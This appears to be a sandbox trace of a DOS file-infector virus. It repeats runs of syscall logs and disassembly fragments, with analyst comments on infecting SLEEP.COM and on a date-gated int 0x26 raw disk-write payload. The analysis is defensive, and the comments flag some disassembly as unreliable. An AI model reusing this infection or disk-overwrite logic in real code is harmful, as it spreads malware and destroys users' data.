0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:12.733266391Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.182625441Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.186310892Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.193778206Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.200525625Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.203461598Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.205469217Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.206597921Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.208310386Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.216363777Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.222119411Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.223512586Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.231230082Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.240961548Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.243839099Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.251104101Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.258809722Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.26125824Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.272326341Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.274178104Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.280764136Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.286593037Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.28915235Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.29175525Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.294224797Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.296409985Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.304879347Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.307402423Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.309414561Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.317062967Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.32823171Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.330853825Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.337795305Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.345053409Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.347576359Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.357907093Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.36002835Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.367996441Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.371077812Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.373946985Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.37785667Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.379549722Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.381897828Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.391006104Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.393997849Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.395717633Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.403780266Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.413793899Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.416197433Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.420741727Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:12.774584079Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:12.777284696Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:12.780047009Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:12.783831652Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:12.785604654Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:12.797034734Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.809651607Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:12.816185034Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:12.818474921Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.18028959Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.182969346Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.19122065Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.19412667Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.196653088Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.199863557Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.201642136Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.204113713Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.214936407Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.217019823Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.218361552Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.226597906Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.237454069Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.240063083Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.247032461Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.253301216Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.255296431Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.265806878Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.268044984Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.274565941Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.277654181Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.280320849Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.282845782Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.284209258Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.286575711Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.295600929Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.298035555Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.300824822Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.308571917Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.318417478Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.322058086Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.328707977Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.335268282Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.338066377Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.348130895Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.349856777Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.35786507Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.360616234Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.364080657Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.367591624Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.368983938Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.371024513Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.380134002Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.382398972Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.383770864Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.393524489Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.401661966Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.403458418Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.409353191Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:14.180045088Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:14.182890443Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:14.185989762Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:14.190279857Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:14.191575172Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:14.202552327Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.215600092Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:14.222543213Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:14.236331564Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.254234752Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.256314406Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.263896173Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.266829017Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.269474992Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.272511903Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.274000233Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.276333584Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.286606421Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.288956628Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.290350144Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.299018148Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.309928926Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.312728366Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.320361646Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.327524545Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.330003885Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.341666463Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.34380199Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.351090725Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.353955136Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.356958697Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.359766805Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.361265877Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.364005858Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.373302727Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.375450372Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.377109636Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.382720897Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.393720791Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.396818319Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.401046581Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.405364551Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.407253225Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.413602697Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.414794685Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.419641867Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.42147197Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.423101235Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.425033295Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.426226611Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.427549007Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.433590575Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.435439945Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.436590527Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.441811136Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.448174788Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.449634948Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.455018624Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:14.538649623Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:14.541414519Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:14.544530802Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:14.548710647Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:14.550249726Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:14.562146972Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.575077155Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:14.582350453Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:14.584696053Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.60110932Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.602735628Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.610001636Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.614169495Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.617012382Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.620002419Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.621424798Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.623544402Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.633104248Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.635968826Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.637457307Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.646400113Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.657858559Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.66064796Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.668264667Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.67524829Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.677547247Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.688937915Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.690871023Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.698729247Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.702076798Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.704946857Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.70769801Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.709186876Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.711600719Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.72071176Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.722839955Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.724496047Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.732655968Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.743305281Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.746309043Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.753828402Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.761749508Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.764824004Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.775867731Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.777550812Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.782846901Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.785289409Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.787146485Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.78998723Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.791099132Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.792650903Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.79869679Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.801161116Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.802669549Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.810962139Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.8218105Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
; Window after the "Get date" call at PC 12b6f; its first instruction (cmp dx, 0x606) is on the trace row above.
; DOS returns the month in DH and the day in DL, so 0x0606 is 6 June; the run configurations on this page use 1 January.
; From 0x12b7b the linear sweep runs through bytes that are probably data, so those mnemonics are unreliable.
0x12b73: je 0x12b78  ; date matches: take the 0x12d28 path
0x12b75: jmp 0x12d94  ; otherwise continue at 0x12d94; the trace next logs calls at PC 12d9f and 12da6
0x12b78: jmp 0x12d28  ; date-triggered path, outside this window
0x12b7b: and ah, bh  ; not reachable by fall-through (follows an unconditional jmp); presumably data
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 then 8B EC would be push bp / mov bp, sp from 0x12b84, so the sweep looks misaligned
0x12b86: in al, dx  ; opcode EC, likely the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; INT 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DS:DX = bp - 0x2c, presumably the stack buffer reserved above
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; INT 21h AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 (directory bit)
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at offset 0x1b8; the window ends before the int
2018-12-25T12:45:14.824772233Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.829032297Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:14.802324026Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
; Window of 16-bit DOS code after the "Get date" call at PC 12a5a; its first instruction (cmp dl, 2) is on the trace row above.
; DOS returns the day of the month in DL, so the int 0x26 path below is gated on day 2; the run configurations on this page set Day to 1.
; NOTE(review): the syscall numbers in this trace match INT 21h AH values, so an int 0x26 may not be logged at all - confirm before reading its absence as "not executed".
0x12a5d: je 0x12a62  ; DL == 2: fall into the raw disk-write path
0x12a5f: jmp 0x12a80  ; any other day: straight to the ret
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; cdq and cwd share one opcode; in 16-bit code it executes as cwd (DX = sign extension of AX)
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count for int 0x26
0x12a69: int 0x26  ; DOS absolute disk write: raw sectors, bypassing the file system (AL = drive, DX = first sector, DS:BX = buffer)
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc
0x12a74: mov dx, 0  ; DX = 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; 0x22a62 - 0x12a80 = 0xffe2, i.e. -0x1e as a signed 16-bit displacement: the real target is presumably 0x12a62 (the int 0x26 path)
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; the window ends here
2018-12-25T12:45:14.805079982Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:14.808154791Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:14.812536851Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:14.813612743Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:14.824895598Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.842236558Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:14.850632905Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
; Window of 16-bit DOS code after the "Get time" call; its first instruction (add dl, dh) is on the trace row above.
; Read with the trace: clear the target's attributes, close it, reopen it read/write, then begin writing.
; Analyst note: an attribute reset followed by a read/write reopen of an existing .COM file is a behavioural indicator of a file infector.
0x12c90: je 0x12c8a  ; DL + DH was zero: branch back (target is before this window), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; si = 0x115 + word stored at 0x106 (looks like a relocation delta; TODO confirm)
0x12c99: mov byte ptr [si], dl  ; store the time-derived byte; NOTE(review): possibly a per-copy key, its use is not shown here
0x12c9b: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0: no attributes, so read-only/hidden/system are cleared
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = si + 0xca, the path argument of the attribute call
0x12ca6: int 0x21  ; logged in the trace as "Get or set file attributes" (PC 12ca8)
0x12ca8: mov ah, 0x3e  ; INT 21h AH=3Eh: close the handle in BX
0x12caa: int 0x21  ; logged as "Close file" (PC 12cac)
0x12cac: mov ax, 0x3d02  ; INT 21h AH=3Dh, AL=02h: open for read/write
0x12caf: int 0x21  ; logged as "Open file" (PC 12cb1)
